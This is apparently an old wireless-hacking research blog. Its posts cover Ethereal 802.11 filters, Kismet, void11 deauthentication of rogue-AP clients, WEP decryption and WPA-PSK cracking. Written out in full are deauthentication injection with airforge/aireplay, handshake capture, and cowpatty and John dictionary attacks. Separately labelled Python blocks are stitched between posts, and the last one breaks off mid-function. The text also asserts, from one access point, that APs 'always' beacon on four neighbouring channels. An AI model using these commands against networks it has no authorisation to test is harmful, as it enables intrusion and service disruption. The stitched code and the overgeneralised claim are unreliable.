From Rexploit

[-=] Research Blog [=-]

Posted here will be our technical rantings. Check on a regular basis for new material. For all forum replies on topics here please use the post date as the subject to keep things orderly and easier to find.


.: Friday, September, 2 - Ethereal Wireless Filters :.


.: Posted by William :.

It's been a while since I've posted, but here I am. I'm about to start adding videos and posts on a monthly basis now. I'll be focusing on Cisco network hijinks, but just to restart the blog I'll start with Ethereal wireless filters since I've been using these lately. I could not find a reference manual or anything of that sort to point out which filters show what, so I've made my own. If you deal with wireless on a daily basis the filters shown below are a lifesaver.


Now, 802.11 wireless uses three types of frames:

  • Management - used to control joining and leaving a BSS
  • Control - acknowledge the reception of incoming data frames
  • Data - carry upper-layer data


The corresponding display filter syntax for each type is as follows:

Management Frames
wlan.fc.type == 0

Control Frames
wlan.fc.type == 1

Data Frames
wlan.fc.type == 2

There are eleven types of management frames:

  • Association request frame
  • Association response frame
  • Reassociation request frame
  • Reassociation response frame
  • Probe request frame
  • Probe response frame
  • Beacon frame
  • ATIM frame
  • Disassociation frame
  • Authentication frame
  • Deauthentication frame


I will only discuss the relevant frames and the filters that correspond to them. By displaying only specific packets you can analyze specific frame types for any errors or misconfigurations you might have on your wireless network, or harvest information from a nearby wireless network for pentesting purposes of course ;-).

Association Request Frames
wlan.fc.type_subtype == 0

Association Response Frames
wlan.fc.type_subtype == 1

Probe Request Frames
wlan.fc.type_subtype == 4

Probe Response Frames
wlan.fc.type_subtype == 5

Beacon Frames
wlan.fc.type_subtype == 8

Here is a useful tip for this filter: type it in but add an exclamation point at the beginning, and it will exclude all beacons and leave you with the more useful frames.

!wlan.fc.type_subtype == 8

Authentication Frames
wlan.fc.type_subtype == 11

Deauthentication Frames
wlan.fc.type_subtype == 12
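The filters above are just comparisons on the two-byte Frame Control field at the start of every 802.11 frame. The following Python, an added example rather than code from this post, parses that field from raw frames, evaluates the post's filter strings (including the negated beacon filter) against a constructed capture, and counts who is transmitting deauthentication frames; the BSSID and client MAC are reused from later posts on this page, and the spoofed source address is made up.

```python
"""Evaluate the wlan.fc.type / wlan.fc.type_subtype display filters from the
post against raw 802.11 frames. Added example, not code from the post."""
import re
from collections import Counter

# Frame Control byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
# Ethereal/Wireshark's wlan.fc.type_subtype is (type << 4) | subtype, which is
# why a beacon (type 0, subtype 8) filters as 8 and a deauth as 12.
def frame_control(frame: bytes) -> dict:
    if len(frame) < 2:
        raise ValueError("frame too short for a Frame Control field")
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    return {"version": fc0 & 0x03, "type": ftype, "subtype": subtype,
            "type_subtype": (ftype << 4) | subtype}

FILTER_RE = re.compile(r"^\s*(!?)\s*wlan\.fc\.(type|type_subtype)\s*==\s*(\d+)\s*$")

def match_filter(frame: bytes, expr: str) -> bool:
    """True when the frame would be displayed under the given filter string."""
    m = FILTER_RE.match(expr)
    if not m:
        raise ValueError(f"unsupported filter: {expr!r}")
    negate, field, value = m.group(1) == "!", m.group(2), int(m.group(3))
    return (frame_control(frame)[field] == value) != negate

def count_matching(frames, expr: str) -> int:
    return sum(match_filter(f, expr) for f in frames)

def mac(s: str) -> bytes:
    return bytes(int(b, 16) for b in s.split(":"))

def build_frame(fc0: int, addr1: str, addr2: str, addr3: str) -> bytes:
    """24-byte MAC header: FC, duration, addr1, addr2, addr3, sequence control.
    Used for every sample for simplicity; real control frames are shorter."""
    return bytes([fc0, 0x00, 0x00, 0x00]) + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00"

AP = "00:09:5b:fe:80:4a"        # BSSID taken from the post
CLIENT = "00:23:3a:4f:10:11"    # client MAC taken from the post
SPOOFED = "02:00:00:00:00:01"   # constructed transmitter for the sample deauths
BCAST = "ff:ff:ff:ff:ff:ff"

# Constructed capture: 3 beacons, probe request, authentication, association
# request, 2 deauthentications, 1 ACK (control), 1 data frame.
SAMPLE_FRAMES = (
    [build_frame(0x80, BCAST, AP, AP)] * 3 +
    [build_frame(0x40, BCAST, CLIENT, BCAST),
     build_frame(0xB0, AP, CLIENT, AP),
     build_frame(0x00, AP, CLIENT, AP)] +
    [build_frame(0xC0, CLIENT, SPOOFED, AP)] * 2 +
    [build_frame(0xD4, CLIENT, AP, AP),     # ACK: type 1, subtype 13
     build_frame(0x08, AP, CLIENT, AP)]     # data: type 2, subtype 0
)

def deauth_sources(frames) -> dict:
    """Who is transmitting deauthentication frames (keyed on Addr2). When clients
    keep dropping, a deauth from an address that is not the AP's points at a flood."""
    counts = Counter()
    for f in frames:
        if match_filter(f, "wlan.fc.type_subtype == 12"):
            counts[":".join(f"{b:02x}" for b in f[10:16])] += 1
    return dict(counts)

if __name__ == "__main__":
    for expr in ("wlan.fc.type == 0", "wlan.fc.type == 1", "wlan.fc.type == 2",
                 "wlan.fc.type_subtype == 8", "!wlan.fc.type_subtype == 8"):
        print(f"{expr:30s} -> {count_matching(SAMPLE_FRAMES, expr)} frames")
    print("deauth transmitters:", deauth_sources(SAMPLE_FRAMES))
```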


I hope this helps as a good reference.


~Will


.: Sunday, May, 30 - Kismet Primer Guide :.


.: Posted by William :.


This is a quick and dirty shakedown of the Kismet interface and key shortcuts. The key for the command will be presented, followed by its description in parentheses. Before continuing, it is important that you sort the network list so you can select networks. Press the S (Sort) key and choose how you want the network list organized by pressing the key that corresponds to the sort method.


Below is a screenshot of Kismet showing three different types of networks.

- Two Encrypted Networks (SSID: 2WIRE521, 2WIRE514) using WEP

- One Hidden Encrypted Network (SSID: Zemfira) using WPA

- One unencrypted network with no SSID

(Screenshot: Kismet_blog.jpg)


Interface Overview

Ok, using the above image as reference and going from left to right, the basic Kismet interface consists of:

- Name : SSID of network

- T : Type of network

- W : Identifies if network is secured or not

- Ch : Channel the Access Point is on

- Packts : Number of packets captured

- Flags : Method in which IP was gathered (ex. A4 means IP was learned through ARP packet)

- IP Range : IP of the network

- Size : Total size of packets gathered from the Access Point


Identifying Security

Secured networks are always shown in green, and the W column shows either Y (Yes) for WEP or O (Other) if any other type of security is used, such as WPA/TKIP/LEAP/EAP/TLS. When you see an O in the W column, select the network, press the I (Network Information) key and scroll down to the Encrypt : field, where the specific type of security used is listed.


Color Coding

Kismet colors the networks listed to make it easier to identify its configuration. The following are the possible color combinations:

- Yellow : Unencrypted network

- Red : Networks this color are still using factory defaults

- Green : This identifies secured networks using either WPA, WEP, or another form of security

- Blue : These are hidden networks which can either be open or encrypted so check the W column


Network Type

The T (Type) column can list six possible wireless network types.

- A (Access Point) - normal wireless access point

- H (Ad-Hoc) - ad-hoc point-to-point wireless network

- P (Probe request) - A wireless client that is not associated but is searching for a network

- D (Data) - Data network

- T (Turbocell) - Turbocell network

- G (Group) - Group of wireless networks. Not exactly a network type, but you have the option to group networks together


Additional List of Options

Kismet has oodles of options to use, so here is a command reference that is self-explanatory.


e - Open popup window of Kismet servers. This lets you simultaneously monitor two or more Kismet servers on different hosts.

z - Zoom network display panel to full screen (or return it to normal size if it is already zoomed)

m - Mute sound and speech if they are enabled (or unmute them if they were previously silenced). You must have sound or speech enabled in your config to be able to mute or unmute them.

t - Tag (or untag) the current network

g - Group currently tagged networks

u - Ungroup current group

c - Open client popup window to display clients in the selected network

n - Rename selected network or group

i - Display detailed information about the current network or group

s - Sort the network list differently

l - Show signal/power/noise levels if the card reports them

d - Instruct the server to start extracting printable strings from the packet stream and display them.

r - Display bar graph of the packet rate.

a - Show statistics about packet counts and channel allocation.

p - Display packet types as they are received.

f - Follow the estimated center of a network and display a compass

w - Display all previous alerts and warnings.


~William



.: Sunday, May, 22 - 802.11b attacks on 802.11g :.


.: Posted by William:.


This is a follow-up to the Aireplay injection blog post, in which I explained how I was able to perform WEP cracking using aireplay by attacking an 802.11g network with an 802.11b card. My results were sporadic, but soon I figured out why. The type of modulation used by an access point is the main factor that determines whether you will be able to see 802.11g station traffic on your 802.11b card. Both 802.11b and 802.11g use the same frequency and channels, so the potential for an 802.11b station signal to collide with an 802.11g station signal exists.

When an access point sees a mixed environment it will start to use protection mechanisms to prevent DSSS transmissions (802.11b) from colliding with OFDM transmissions (802.11g). One mode that can be used is DSSS-OFDM, in which the preamble and PLCP low-level headers are modulated using DBPSK or DQPSK and the rest of the packet is sent in OFDM. 802.11b stations can now see the low-level headers, so no collisions occur. If only 802.11g stations exist, ERP-OFDM will be used to modulate the entire packet; in a pure 802.11g network an 802.11b sniffer will not see anything.

802.11g uses OFDM modulation to achieve 54mbps data rates while 802.11b utilizes DQPSK (Differential Quaternary Phase Shift Keying) to reach 11mbps rates with the proper encoding and DBPSK (Differential Binary Phase Shift Keying) for a rate of 1Mbps. The entire inner workings of 802.11 are a bit more complicated and this is just a simplified explanation.


Let's say you use an SMC2532W-B or any other Prism 2.5 based card to sniff on a network with 802.11g stations. At first you will not see anything, because all that exists are 802.11g stations and ERP-OFDM mode will be used. But let's say an 802.11b station associates to the access point. This will cause the access point to use DSSS-OFDM mode to prevent collisions, and now your 802.11b station will see -only- the low-level headers of the packet. If you were using aireplay to capture and reinject a packet you will see the packet, but when you replay it, it will not work because you are only replaying headers.

Now let's say more 802.11b stations associate. The access point may decide to switch to a different modulation scheme for maximum compatibility and less overhead, such as DQPSK or DBPSK, which will bring the data rate of 802.11g stations down to the same level as 802.11b stations; now your 802.11b card running aireplay will see the entire packet and injection will be successful. Another scenario in which you could sniff an 802.11g station's traffic would be if the station were far enough from the access point that it would have to drop data rates and use a more robust modulation technique such as DQPSK or DBPSK; again, your 802.11b card will sniff successfully.

If you were to use aireplay with an 802.11g card such as a Netgear WG511 and then replay the packet or chopchop it with an 802.11b Prism card (the SMC2532W-B is a good example), the 802.11b card will successfully inject or chopchop it, because the packet was originally captured by an 802.11g card which captured the entire packet. I highly recommend that you all read about the modulation and encoding techniques of 802.11 to learn how 802.11 works at the physical layer.

I recommend the following two books as excellent resources:

802.11 (Wi-Fi) Networking Handbook (http://www.amazon.com/exec/obidos/ASIN/0072226234/qid%3D1116798187/sr%3D11-1/ref%3Dsr%5F11%5F1/104-0889385-2995116)

CWNA Official Study Guide (http://www.amazon.com/exec/obidos/ASIN/0072255382/qid%3D1116798267/sr%3D11-1/ref%3Dsr%5F11%5F1/104-0889385-2995116)


~William



.: Monday, May, 16 - Void11 Rogue Access Point Counter-Offense :.



.: Posted by William :.


After looking at many high-priced solutions for wireless protection, the one feature they all had was the ability to prevent hosts from authenticating to a rogue access point. All that was used was to send a deauth frame to knock the station off, and we already know something that can do this! Detection of rogue access points can be done with Kismet easily enough, but using Void11 as an active defense in response is better. You have all used void11 for deauthenticating hosts on an access point, but let us use it in a more constructive way. You can create a text file with BSSID and SSID entries and have void11 either deny or permit the entries listed. Void11 calls this a matchlist. When a rogue access point comes online, its SSID or BSSID will be compared against the matchlist and void11 will promptly deauthenticate any host that associates to it. By default void11 will permit all entries in a matchlist.

To specify entries within a matchlist the following syntax is used: (Put an empty new line after each entry)

Match BSSID:

B:00:09:5B:23:A4:9E

Match SSID:

S:AP_1


Create a matchlist with all the BSSIDs and SSIDs of your access points. Here is an example. Assume you have four access points with the BSSIDs of:

BSSID #1: 00:09:5B:FE:80:4A
BSSID #2: 00:09:5B:3A:1C:01
BSSID #3: 00:09:5B:6E:F2:E6
BSSID #4: 00:09:5B:22:A3:E2


Also the SSID is:

SSID: Krasnaya


Put both the SSID and the BSSIDs of the access points into a text file that looks like the following:

S:Krasnaya

B:00:09:5B:FE:80:4A

B:00:09:5B:3A:1C:01

B:00:09:5B:6E:F2:E6

B:00:09:5B:22:A3:E2


Save the text file with the name matchlist.


Now it is time to run void11. You will require a Prism 2/2.5 wireless card running with the hostap drivers. The steps to configure the Prism card and void11 are:

1) Use hostap drivers

switch-to-hostap

Eject and reinsert your card.


2) Prepare card to use void11

iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master


3) Start channel hopping and void11

Channel Hopping

void11_hopper >/dev/null &

Void11

void11_penetration -l matchlist -D wlan0

(ignore the ioctl[PRISM_IOCTL_HOSTAPD]: Invalid argument error, void11 will still function)


.: Shortfalls :.
----------------
A skilled wireless hacker could simply spoof his rogue AP's SSID and BSSID with a valid one sniffed using Kismet and evade the void11 defense, but using the same BSSID creates a duplicate BSSID, and using Kismet you can detect it. As a temporary solution you could change the SSIDs, if possible, to knock clients off the rogue access point, but this solution is difficult on large-scale wireless networks. In the end it becomes a game of cat and mouse to find the location of the rogue access point.


Now when any client attempts to associate to a rogue access point it will be kicked off, leaving the rogue AP useless. Some ideas for a practical deployment would be to utilize a notebook computer with a high-power wifi card: either a Senao NL-2511 or an SMC2532W-B with either an external omni or a directional patch antenna to provide extended coverage. Maybe two antennas using both connectors on the card would work also. I will work on a script to automate void11 setup for use as a startup script to make this type of solution more reliable.
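The matchlist format above is simple enough to parse, and the same list can feed a passive check alongside the active one: compare what Kismet sees against the list and flag the two cases the Shortfalls section describes, an unknown BSSID advertising your SSID and a listed BSSID showing up on more than one channel. This Python is an added example, not void11's code; the matchlist text and beacon observations are constructed, with the BSSIDs and SSID taken from the example above and the two intruders made up.

```python
"""Parse a void11-style matchlist (S: and B: entries separated by blank lines)
and check observed beacons against it. Added example, not void11 code."""
import re
from collections import defaultdict

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$")

# The matchlist from the post, as a string instead of a file.
MATCHLIST_TEXT = """S:Krasnaya

B:00:09:5B:FE:80:4A

B:00:09:5B:3A:1C:01

B:00:09:5B:6E:F2:E6

B:00:09:5B:22:A3:E2
"""

def parse_matchlist(text: str):
    """Return (ssids, bssids). Lines are 'S:<ssid>' or 'B:<bssid>'; blank lines
    are separators. BSSIDs are upper-cased so comparisons are exact."""
    ssids, bssids = set(), set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("S:"):
            ssids.add(line[2:])
        elif line.startswith("B:"):
            mac = line[2:].upper()
            if not MAC_RE.match(mac):
                raise ValueError(f"line {lineno}: bad BSSID {line[2:]!r}")
            bssids.add(mac)
        else:
            raise ValueError(f"line {lineno}: unknown entry {line!r}")
    return ssids, bssids

# Constructed beacon observations as (bssid, ssid, channel), the fields a
# Kismet network list shows. The four listed APs plus two intruders and a
# neighbour's unrelated network.
OBSERVED = [
    ("00:09:5B:FE:80:4A", "Krasnaya", 6),
    ("00:09:5B:3A:1C:01", "Krasnaya", 11),
    ("00:09:5B:6E:F2:E6", "Krasnaya", 1),
    ("00:09:5B:22:A3:E2", "Krasnaya", 6),
    ("02:11:22:33:44:55", "Krasnaya", 6),     # rogue: our SSID, unknown BSSID
    ("00:09:5B:FE:80:4A", "Krasnaya", 11),    # listed BSSID also seen on ch 11
    ("00:1A:2B:3C:4D:5E", "Guest", 1),        # unrelated neighbour network
]

def find_rogues(observed, ssids, bssids):
    """Return a sorted list of (kind, bssid, detail) findings:
    'unknown-bssid'   - advertises one of our SSIDs but is not in the matchlist
    'duplicate-bssid' - a listed BSSID seen on more than one channel (spoofing)"""
    findings = set()
    channels = defaultdict(set)
    for bssid, ssid, ch in observed:
        b = bssid.upper()
        channels[b].add(ch)
        if ssid in ssids and b not in bssids:
            findings.add(("unknown-bssid", b, f"advertises {ssid!r} on channel {ch}"))
    for b, chans in channels.items():
        if b in bssids and len(chans) > 1:
            findings.add(("duplicate-bssid", b, f"seen on channels {sorted(chans)}"))
    return sorted(findings)

if __name__ == "__main__":
    ssids, bssids = parse_matchlist(MATCHLIST_TEXT)
    for kind, bssid, detail in find_rogues(OBSERVED, ssids, bssids):
        print(f"{kind:16s} {bssid}  {detail}")
```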

~William



.: Friday, May, 6 - WPA Cracking and Kismet/GPS Extras :.



.: Posted by William :. and .: Posted by Re@lity :.


With WEP conquered it's time to move on to its successor... WPA! The following explains cowpatty usage and some interesting notes on WPA. The end of the post has a primer on using a GPS, Kismet, and gpsdrive.

Equipment

Note: You do not need the exact equipment listed here to try a WPA attack. Any Prism or Atheros card will work for monitoring and deauthenticating.

The equipment I used for the WPA testing is:

- Netgear WG511 (PrismGT)
- Cisco Aironet CB21AG-A-K9 A/B/G card (used wpa_supplicant to authenticate to the access point)
- Netgear WGR614 Wireless Router (set to channel 8)


Configuration

The Netgear WG511 was set into monitor mode and Ethereal was run on it to monitor traffic:

ifconfig eth0 up
iwconfig eth0 mode monitor channel 8


The WPA client card was the Cisco card and wpa_supplicant was used.

wpa_supplicant.conf configuration

network={
ssid="Zemfira"
proto=WPA
key_mgmt=WPA-PSK
psk="alsurules"
scan_ssid=1
}

wpa_supplicant command

wpa_supplicant -i ath0 -c /etc/wpa_supplicant.conf -D madwifi

The access point was simply set to WPA-PSK with the passphrase alsurules and put on channel 8.


Interesting Observations

Many of you might have tried to use cowpatty without much success because it gave an error message saying a 4-way handshake was not found. That is because of some strange behavior between the client and access point when initiating WPA authentication for the first time. I set the WG511 card to monitor channel 8, then inserted the Cisco card and ran wpa_supplicant, but would only receive two EAPOL frames instead of the four required by cowpatty. Once the card was authenticated I deauthenticated it with the WG511, and then I got the entire four-way handshake. Only after the card was authenticated and I kicked it off would I get the four-way handshake, so I decided to look into this, and the results were interesting.

When you run wpa_supplicant it looks for the Access Point, but the configuration file does not specify a channel, so an authentication request is sent on each channel until the Access Point responds; then the WPA authentication proceeds, but the initial WPA authentication is spread over a few channels (this is explained below). Now, the Access Point I used would broadcast its presence over a range of 9 channels. Channel 8 was set on the Access Point but it broadcast beacons out on channels 4 through 12, so the initial WPA authentication was spread over that range of channels. To explain this in further detail, it seems a predefined range is used by the Access Point, a Netgear WGR614 in this test, to listen for clients. Four channels above and below the main channel are always used.


PLEASE VERIFY THIS ON YOUR ACCESS POINTS. POST BRAND AND MODEL AND WHETHER THE RANGES ARE CONSISTENT. POST RESULTS IN THE FORUM.



Example

If channel 8 is used, channels 4, 5, 6, 7, 8, 9, 10, 11, 12 are used (9 channels in all). Do you see how it's the four channels above 8 that are used (9, 10, 11, 12) and the four channels below the main channel (4, 5, 6, 7)? This is always the case.

So if the channel is set to channel 11 then the range would be 6, 7, 8, 9, 10, 11, 12, 13, 14.



This explains why many of you could not get cowpatty to find the complete four-way handshake: it was spread across a range of channels. So the only solution is to deauthenticate an already authenticated station and capture the WPA re-authentication. This will work because after the initial WPA authentication the card will be set on the Access Point's main channel, which is the channel the WG511 is monitoring, and the problem of the WPA authentication being spread over a range of channels is nonexistent.

To test the range of channels your Access Point broadcasts itself on, set a card into monitor mode and run Ethereal. Change the channel your card monitors, incrementing from channel 1 to channel 14, and record on which channels you see your Access Point broadcasting beacons.


The Attack

The attack consists of running Ethereal with the WG511 to capture traffic on the Access Point's channel. Authenticate a station to your Access Point using wpa_supplicant. I used my WG511 card to monitor and inject traffic; you can use an Atheros card or a Prism card (with wlan-ng drivers) to do the same.


1) Create a deauthentication packet with airforge:

airforge 00:09:5E:3C:80:31 00:23:3A:4F:10:11 deauth.cap

Syntax: airforge <bssid> <dst mac> <packet-name>

With airforge, specify the BSSID, the MAC address of the station you want to deauthenticate, and a name for the packet.


2) Inject deauth.cap packet with aireplay:

aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.cap eth0

Syntax: aireplay -r <packet> <interface>


Input the name of the packet created with airforge and the interface on which you want to inject, in this case the same one that is monitoring. Let aireplay inject for about 10 seconds, then stop it.


3) In Ethereal, type EAPOL in the display filter dialog and if all goes well you should see four EAPOL packets. The handshake consists of four specific packets. Expand the 802.1x Authentication tree and then the Key Information subtree. This portion of the packet contains the specific options we are looking for.

The four-way handshake consists of the following four packets. Take note of the Key Information since the values must match the packets you receive.


Packet One (http://new.remote-exploit.org/images/1/15/5-6-05_eapol_1.jpg)

Packet Two (http://new.remote-exploit.org/images/1/1c/5-6-05_eapol_2.jpg)

Packet Three (http://new.remote-exploit.org/images/e/e7/5-6-05_eapol_3.jpg)

Packet Four (http://new.remote-exploit.org/images/9/9d/5-6-05_eapol_4.jpg)


Cowpatty uses packets 2 through 4 to attack WPA. Cowpatty identifies the passphrase used to generate the PMK, and packets 2 through 4 provide the necessary info to carry out the attack. Many articles exist on how WPA authenticates, so I will not go into detail on how it actually does it; go to http://wifinetnews.com/archives/002452.html for info on the WPA weakness.

Once you have the four required packets, save the packet capture.


4) Using cowpatty to bruteforce passphrase:

cowpatty -f dictionary.txt -r capture.cap -s Zemfira

Syntax: cowpatty -f <dict-file> -r <pcap file> -s <network-ssid>

Specify your dictionary file, then the saved packet capture and, most importantly, the SSID of the network. The SSID must be correct; if not, the PMK generation will be off. If all goes well and you have the correct word within your dictionary file, cowpatty will give you the passphrase.
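Steps 3 and 4 together, as an added Python example that is neither the post's nor cowpatty's code: decode the Key Information field of EAPOL-Key frames to label handshake messages 1 to 4 (the WPA case where messages 2 and 4 carry the same flags is handled by looking at the key data length), and derive the WPA-PSK PMK from passphrase and SSID, which shows why the SSID given to cowpatty must be exact. The EAPOL frames, nonces and WPA IE are constructed, not captured.

```python
"""Label four-way handshake messages from EAPOL-Key Key Information, and
derive the WPA-PSK PMK. Added example; not from the post or cowpatty."""
import hashlib
import struct

# Key Information bit layout (IEEE 802.11i EAPOL-Key descriptor)
KEY_TYPE_PAIRWISE = 1 << 3
INSTALL = 1 << 6
KEY_ACK = 1 << 7
KEY_MIC = 1 << 8
SECURE = 1 << 9
ENCRYPTED_KEY_DATA = 1 << 12
FLAG_NAMES = {KEY_TYPE_PAIRWISE: "Pairwise", INSTALL: "Install", KEY_ACK: "Ack",
              KEY_MIC: "MIC", SECURE: "Secure", ENCRYPTED_KEY_DATA: "EncKeyData"}

def parse_eapol_key(frame: bytes) -> dict:
    """frame = 4-byte EAPOL header + EAPOL-Key body (95-byte fixed part + key data).
    Body offsets: descriptor[0], key info[1:3], key length[3:5], replay counter[5:13],
    nonce[13:45], IV[45:61], RSC[61:69], ID[69:77], MIC[77:93], key data length[93:95]."""
    ptype, length = frame[1], struct.unpack(">H", frame[2:4])[0]
    if ptype != 3:
        raise ValueError("not an EAPOL-Key frame")
    body = frame[4:4 + length]
    key_info = struct.unpack(">H", body[1:3])[0]
    return {"descriptor": body[0], "key_info": key_info,
            "flags": [n for bit, n in FLAG_NAMES.items() if key_info & bit],
            "nonce": body[13:45],
            "key_data_len": struct.unpack(">H", body[93:95])[0]}

def handshake_message(info: dict) -> int:
    """1..4 for the four-way handshake messages, 0 for anything else (e.g. group key)."""
    ki = info["key_info"]
    if not ki & KEY_TYPE_PAIRWISE:
        return 0
    if ki & KEY_ACK and not ki & KEY_MIC:
        return 1
    if ki & KEY_ACK and ki & KEY_MIC and ki & INSTALL:
        return 3
    if ki & KEY_MIC and not ki & KEY_ACK:
        # Under WPA (TKIP) messages 2 and 4 show the same Key Information
        # (0x0109); message 2 is the one carrying key data (the WPA/RSN IE).
        return 2 if info["key_data_len"] > 0 else 4
    return 0

def classify_capture(frames) -> list:
    return [handshake_message(parse_eapol_key(f)) for f in frames]

def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, so a wrong SSID gives a wrong PMK for every guess,
    and each guess costs 4096 HMAC rounds: the only thing cowpatty exploits is a
    passphrase weak enough to be in a wordlist."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def build_eapol_key(key_info: int, nonce: bytes, key_data: bytes = b"") -> bytes:
    """Constructed WPA (descriptor type 254) EAPOL-Key frame; MIC/IV/RSC zeroed."""
    body = (bytes([254]) + struct.pack(">H", key_info) + struct.pack(">H", 32)
            + bytes(8) + nonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)
            + struct.pack(">H", len(key_data)) + key_data)
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body

ANONCE, SNONCE = bytes([0xA1]) * 32, bytes([0x5B]) * 32   # constructed nonces
WPA_IE = bytes.fromhex("dd160050f20101000050f20201000050f20201000050f202")  # constructed
SAMPLE_HANDSHAKE = [
    build_eapol_key(0x0089, ANONCE),            # 1: Pairwise, Ack
    build_eapol_key(0x0109, SNONCE, WPA_IE),    # 2: Pairwise, MIC, carries WPA IE
    build_eapol_key(0x01C9, ANONCE, WPA_IE),    # 3: Pairwise, Install, Ack, MIC
    build_eapol_key(0x0109, bytes(32)),         # 4: Pairwise, MIC, no key data
]

if __name__ == "__main__":
    for f in SAMPLE_HANDSHAKE:
        info = parse_eapol_key(f)
        print(f"message {handshake_message(info)}: key info 0x{info['key_info']:04x} {info['flags']}")
    print("PMK(alsurules, Zemfira) =", pmk("alsurules", "Zemfira").hex())
```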


Utilizing John the Ripper to Enhance Cowpatty

John can be utilized to create permutations of the words within a dictionary file to increase the chances of guessing the password with cowpatty. Using John will yield forty-nine permutations per word. The command is:

john -w:dictionary.txt -rules -session:johnrestore.dat -stdout:63 | cowpatty -r capture.cap -f - -s Zemfira

Syntax:

john -w:<word-file> -rules -session:johnrestore.dat -stdout:63 | cowpatty -r <pcap-file> -f - -s <ssid>

(cowpatty's -f - reads the wordlist from standard input, which is where John's -stdout output goes.)


Identifying WPA Networks

To identify WPA networks just run Kismet from the latest Auditor release. Previous versions of Kismet present either a Y for WEP encrypted networks or an N for non-WEP encrypted networks, but in the new version of Kismet an O is presented for encrypted networks not using WEP. Simply select the network, press I (information command) and view the Encrypt: field; if you see WPA then you have a WPA network.


GPS Use with Kismet and gpsdrive

Here is a quick guide to configuring a GPS for use with Kismet and how to configure gpsdrive to use Kismet's GPS info to plot Access Points on its map.


1) Configure your GPS (syntax entered is case sensitive!!):

- Press ALT+F2 and enter the command start-gps-daemon.
- Enter the GPS device location and baud rate. Valid device locations (ports) are /dev/ttyUSB0 for USB GPS units and /dev/ttySx for serial GPS units, where x is the serial port number. The baud rate on most GPS devices is 4800.
- To confirm you are receiving data, in your shell type telnet localhost 2947; once you connect, press r and Enter, and if the device location (port) and baud rate are correct you should see raw GPS data being output. The output will look similar to this:

GPSD,R=1
$PRWIRID,12,01.05,07/29/96,0003,*46
$GPRMC,235247,V,4333.1694,N,10813.0065,W,0.000,0.0,120815,12.3,E*42
$PRWIZCH,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0*4D


2) Configure SQL database:

Gpsdrive uses a SQL database in conjunction with Kismet to gather the necessary information to plot Access Points on its map.

- Start the mysql service

/etc/init.d/mysql start

- Go to the /usr/share/doc/gpsdrive directory; within it is the create.sql database template. Create the SQL database using the template:

mysql < create.sql


3) Start Kismet and then gpsdrive. In gpsdrive check the Use SQL option on the left tab.

Gpsdrive should begin to plot the Access Points on its map!

Note: Close gpsdrive first before you close Kismet or else gpsdrive will hang!

To delete the database and create a new one or to backup your database:

- The mysql database file is within the folder /var/lib/mysql/geoinfo
- To create a new database, delete the geoinfo directory and proceed through steps 1 through 2 again.
- To backup just copy the folder to another directory


~ William & Re@lity


Note: This WPA usage of "multi-channel" broadcasting is an interesting issue.
I would like to assess the behaviour further with other AP's, regarding any emerging patterns of channel usage.
Particularly interesting is how the AP or client responds when the chosen channels are not available (blocked, etc).
I'd like, eventually, to test & document here MitM/bridging variations that may be possible with WPA.
Please post to forum (http://forum.remote-exploit.org/index.php) any info about your WPA experiments, etc.
Thanks -  Re@lity.




.: Wednesday, April, 27 - WEP Decryption and Physical Intrusion :.



.: Posted by William :.


I was thinking the other day: "Ok, I cracked the WEP key and I can log in to the network, but what about these encrypted packet captures?". Well, I looked into it and managed to decrypt packet dumps and sniff a network with WEP without associating (assuming I have the WEP key). Also, I have a story on the importance of physical security!


WEP Decryption

Three tested methods exist to decrypt WEP encrypted packet dumps.

1) the decrypt tool that is included with airsnort
2) Ethereal
3) Kismet


decrypt tool

This program will decrypt saved packet dumps and remove the beacons within them for an easier-to-read packet dump. You can provide the known WEP key, or provide a file of WEP keys to attempt to find the correct key.


decrypt -p 1E:A5:A5:6D:28:F5:20:B6:60:23:E2:42:11 -b -m 00:09:5B:FE:80:1C -e encrypted.pcap -d decrypted.pcap


Syntax: decrypt -p <WEP-KEY> -b -m <BSSID> -e <infile> -d <outfile>


When entering the WEP key make sure you separate it with colons as in the example above. The -b option removes beacons from the packet dump. Then the BSSID of the network to decrypt is specified, followed by the encrypted packet dump and the desired output name.


Ethereal

Using Ethereal you can (a) decrypt packet dumps and (b) decrypt packets on the fly without associating to the wireless network. This is the most convenient solution of the three.


Open Ethereal then select EDIT -> PREFERENCES -> PROTOCOLS -> IEEE 802.11


Enter your WEP key into the 'WEP key #1' box. Select 1 in the 'WEP key count', check 'Assume packets have FCS:' and click 'OK'. Any packets captured from now on, as well as previously captured packets, will be decrypted. You can add more WEP keys for Ethereal to use; if you do add more, increase the 'WEP key count' value.


Kismet

Kismet also provides on-the-fly decryption of WEP encrypted traffic like Ethereal. Open the /usr/local/etc/kismet.conf file with an editor and add the wepkey directive as so: wepkey=00:09:5B:FE:80:1C,1EA5A56D28F520B66023E24211


Syntax: wepkey=<BSSID>,<WEP KEY>


Multiple wepkey entries can be used to decode multiple networks.
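What all three tools do once they have the key, as an added Python example (not the decrypt tool's, Ethereal's or Kismet's own code): take the 3-byte IV from the front of the frame body, prepend it to the key, generate the RC4 keystream, XOR the payload and verify the trailing CRC-32 ICV, which is what tells a wrong key from a right one. The key is the one from the decrypt example above in both of the spellings this post uses; the encrypted frame body is constructed in the block by encrypting a sample payload.

```python
"""WEP frame body decryption with a known key, plus the ICV check.
Added example; not code from airsnort's decrypt, Ethereal or Kismet."""
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream (KSA then PRGA) of the requested length."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
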